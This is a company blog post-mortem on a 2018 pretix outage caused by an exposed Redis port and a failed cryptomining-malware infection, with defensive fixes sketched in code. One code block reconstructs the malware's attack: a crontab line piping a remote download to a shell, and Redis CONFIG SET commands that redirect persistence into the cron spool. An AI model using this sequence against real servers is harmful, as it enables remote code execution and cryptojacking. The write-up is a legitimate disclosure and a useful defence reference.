pretix incident post-mortem

19. Feb. 2018

Yesterday morning, the Hosted service was unavailable for approximately 36 minutes. When analyzing the outage, we discovered a severe security vulnerability in our hosting setup that we fixed shortly afterwards.

We firmly believe that no customer data was impacted, so we do not expect any damage to arise from this. There is no action required on your side. This problem was caused by human oversight and could happen anywhere, but as part of our efforts to be as transparent and honest as possible with you, we want to share all the details of this incident.

To be clear, this issue only concerned our hosting service; users of the Community or Enterprise editions are not affected (unless you have similar mistakes in your server setup).

What happened?

Due to a firewall misconfiguration, it was possible to access our Redis cluster without authentication by guessing the correct IP address and port number. This port was open for approximately five days before we noticed it on the morning of February 18th, 2018. The following is a timeline of the events on that day.

On Sunday morning at 07:39 CET, a server infected with the "Linux Lady Malware" (LLM) attempted to automatically propagate the malware to our servers using redis as an attack vector. LLM is a self-spreading malware intended to mine cryptocurrencies for its creator.

LLM spreads to more servers by generating a random IP address and then trying to connect to standard redis ports. It then issues a series of commands to re-configure redis to save its persistent storage to /var/spool/cron/root instead of the normal location. By changing /var/spool/cron/root, it is then able to execute code to download a shell script that replaces all SSH keys with keys of the malware author and installs the actual payload. The linked blogpost describes a detailed analysis of the malware.
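The reconfiguration trick described above can be sketched as follows. This is an illustrative reconstruction, not the malware's actual code: the command names are real Redis commands, but the exact sequence and payload vary between variants, and `resp_encode` is only a helper showing the wire format such a client speaks.

```python
# Sketch of the command sequence this class of malware issues once it finds
# an unauthenticated Redis instance. The cron payload URL is elided; the
# sequence is shown only to illustrate the mechanism.
ATTACK_SEQUENCE = [
    ["SET", "crackit", "\n* * * * * curl ... | sh\n"],  # hostile crontab line
    ["CONFIG", "SET", "dir", "/var/spool/cron"],        # point persistence at the cron spool
    ["CONFIG", "SET", "dbfilename", "root"],            # the dump file becomes root's crontab
    ["SAVE"],                                           # write the RDB dump to disk
]

def resp_encode(args):
    """Serialize one command into the RESP wire format that Redis speaks."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        data = arg.encode()
        out.append(f"${len(data)}\r\n".encode() + data + b"\r\n")
    return b"".join(out)
```

The resulting dump file is not a valid crontab, but cron implementations on many systems are lenient enough to execute the embedded line anyway.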

Luckily for us, /var/spool/cron/root simply does not exist on our systems. Therefore, the installation routine of the malware failed at the very first step. No keys were replaced, no foreign code was executed, and no coins were mined. Even if the file had existed, our redis cluster is not running as the root user but as an unprivileged user with limited access. The only consequence for our server was that the redis instance stopped working due to the incorrect storage location.

Our automatic monitoring then noticed the issue and issued the first alert at 07:42. Since this was early on a Sunday morning, no one reacted to the text alert. In that case, our monitoring system starts issuing wake-up calls to our team fifteen minutes later. At 07:59, someone was able to log in to the server and started researching the problem. Another fifteen minutes later, at 08:15, we had identified the incorrect redis configuration as the cause of the outage and restarted the redis cluster with a clean configuration. From this moment, pretix was available again after a downtime of 36 minutes.

We then immediately started researching possible causes of this problem on the internet and learned about the malware mentioned above. It took us another few minutes to identify the hole in our firewall setup and we were able to close it by approximately 08:25.

To limit the possible impact of this issue, we then invalidated all user sessions, forcing everyone to re-login (see below for further details on this) at approximately 08:30. We then manually verified that there were no visible traces of successful installations of similar malware.

How did the misconfiguration happen?

We make extensive use of Ansible to automatically configure and instrument all our servers. Whenever we add or replace a server in our cluster, we just execute the required set of Ansible roles on the server.

As part of our Ansible set-up process, we configure a firewall on all our servers, and every Ansible role that installs a special service includes the desired firewall configuration for this service. However, the Ansible playbooks do not automatically enable the firewall; this needs to be done manually once for every server. This is a precaution to prevent locking out SSH access in case the Ansible provisioning fails halfway.

Last week, we added a new application worker node to our cluster to improve performance of the overall system. Our application worker nodes are not part of the redis cluster themselves, but run an HAProxy instance that always routes redis connection requests to the current master of our redis cluster. For this new node, we forgot to manually enable the firewall. Even though other services are running on this machine, this redis port was the only service that was openly accessible.

What is the impact of this?

Our redis cluster is used for caching of public information and of temporary session data. Our session data does not usually contain personal information, except for a very short period of time during the ticket checkout process. The more interesting data contained in our redis cluster are the IDs of the sessions themselves.

Theoretically, these session IDs would have allowed an attacker to log in to pretix as any of these sessions and gain access to the administrative backend. However, we strongly believe that nobody did this, for the following reasons:

  • The vulnerability was only present for approximately five days and could only be discovered by chance. Exploiting it would require (a) an advanced manual attack or (b) a complete dump of the redis cluster that is later analyzed manually. We have found no sign of any unauthorized access except for the attempted malware attack outlined above.

  • Among the tens of thousands of sessions, it is not trivially visible which session is still valid, and it is impossible to tell which session has extensive permissions to access the backend. Therefore, an attacker would need to issue a huge number of HTTP requests to try out the session IDs. In the relevant timeframe, we cannot see a statistically significant increase or peak in HTTP requests. Even if an attacker had guessed a working session ID, they would have needed to issue a huge number of HTTP requests to extract a relevant amount of customer data. We do not see any patterns that look like automated scraping in our access logs.

We are therefore confident that no customer data has been leaked. If someone has indeed dumped our redis cluster and has not analysed it yet, this data is now completely useless, as we invalidated all sessions and any possibly stolen session IDs can no longer be used to log in.

What do we do to prevent this in the future?

As mentioned above, we enabled the firewall on the misconfigured server less than an hour after we learned of the issue. However, whenever we encounter an issue with the availability or security of our system, our ambition is not only to fix the issue currently at hand, but to take extensive measures to prevent the entire class of problems from happening again.

In this particular case, there were multiple classes of problems involved. Therefore, we also performed the following changes:

  • Our monitoring system now automatically probes all of our servers for all typically vulnerable open ports every couple of minutes. Every open port that belongs to a well-known database system or similar service now immediately triggers an alert unless it is explicitly whitelisted for that server. This should rule out most simple misconfigurations of our firewalls in the future.
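A minimal sketch of such a probe, assuming a simple TCP connect check (the actual port list and the alerting integration of our monitoring are internal details not shown here):

```python
import socket

# Ports of well-known database/queue services that should never be publicly
# reachable without an explicit whitelist entry. Illustrative selection only.
SENSITIVE_PORTS = {
    6379: "redis",
    5432: "postgresql",
    3306: "mysql",
    27017: "mongodb",
    11211: "memcached",
}

def open_ports(host, ports, timeout=1.0):
    """Return the subset of `ports` on `host` that accept a TCP connection."""
    found = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            if sock.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                found.append(port)
    return found
```

In a monitoring check, any port returned by `open_ports(host, SENSITIVE_PORTS)` that is not on the server's whitelist would raise an alert.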

  • We enabled redis' authentication feature. With this change, access to our redis cluster is no longer possible even if a TCP connection were allowed because of a hole in our firewall or an attacker inside our network. Unfortunately, this configuration change caused another short downtime today around noon.

  • We've hardened our session storage backend. We no longer use the session keys as keys in our redis instance, but instead use an authenticated hash based on the session key itself and the application's SECRET_KEY. This way, even with a complete leak of the redis cluster, it would be close to impossible to impersonate a session. The SECRET_KEY is not known to the machines running the redis cluster. This change will not immediately ship with pretix for on-site installations, as it requires additional effort to allow for backwards compatibility. We will look into shipping it with pretix in the future.
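The key-derivation idea can be sketched as follows. This is a hypothetical illustration, not pretix's actual implementation: the function name, the `session:` prefix, and the placeholder `SECRET_KEY` are all invented for this example.

```python
import hashlib
import hmac

# Placeholder; in a Django application this would be settings.SECRET_KEY,
# which is never deployed to the machines running the Redis cluster.
SECRET_KEY = "application-secret-key"

def redis_session_key(session_key: str) -> str:
    """Derive the Redis storage key from the session key via HMAC-SHA256.

    A dump of Redis then reveals neither the session IDs themselves nor a
    way to forge a valid storage key without knowing SECRET_KEY.
    """
    mac = hmac.new(SECRET_KEY.encode(), session_key.encode(), hashlib.sha256)
    return "session:" + mac.hexdigest()
```

Because HMAC is keyed, an attacker holding the full set of stored keys cannot invert them back to session cookies, and cannot compute the storage key for a guessed session ID either.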

  • We've hardened our session layer to make it harder to steal a backend session, even when session IDs get leaked: Sessions are now pinned to the hash of the browser's user agent. Since the user agent is only stored hashed, this does not create a privacy regression, and it also makes it much harder to take over a session even if you know the session ID, since you also need to know the exact user agent. This change will be available to all installations with the next pretix release. We are also looking into options of using GeoIP services to notify users about logins from countries they do not usually log in from.
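The user-agent pinning above can be sketched like this, again as a hypothetical illustration with invented function names rather than pretix's actual code:

```python
import hashlib
import hmac

def ua_fingerprint(user_agent: str) -> str:
    """Hash the user agent so the raw string is never stored in the session."""
    return hashlib.sha256(user_agent.encode()).hexdigest()

def session_matches_request(session: dict, request_user_agent: str) -> bool:
    """Accept the session only if the request's hashed user agent matches
    the fingerprint recorded at login (constant-time comparison)."""
    return hmac.compare_digest(session["ua_hash"], ua_fingerprint(request_user_agent))
```

A stolen session ID alone is then not enough: the attacker must also reproduce the victim's exact user-agent string to pass the check.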

  • Our manual checklist for installing new servers has been extended to explicitly include activation of the firewall.

We are optimistic that these steps will make it hard for us to miss any further firewall misconfigurations -- and that they will make any data contained in our redis data store nearly useless to any attacker. Some other (completely unrelated) attack vectors will also be less feasible to exploit with the newly hardened session system.

We take the security of our service very seriously and always go the extra mile to make sure you stay safe. As we are humans, security issues might unfortunately still occur from time to time. We deeply apologize for this, and we do everything in our power to find and fix such problems as quickly as we can. If you notice any security problems or have any questions on this topic, please contact us in private. We will always treat your message with the appropriate priority.

Raphael Michel

Raphael is the founder and lead developer of pretix. He is passionate about user-friendly, elegant software and, when he is not too busy with pretix, enjoys organizing conferences himself.
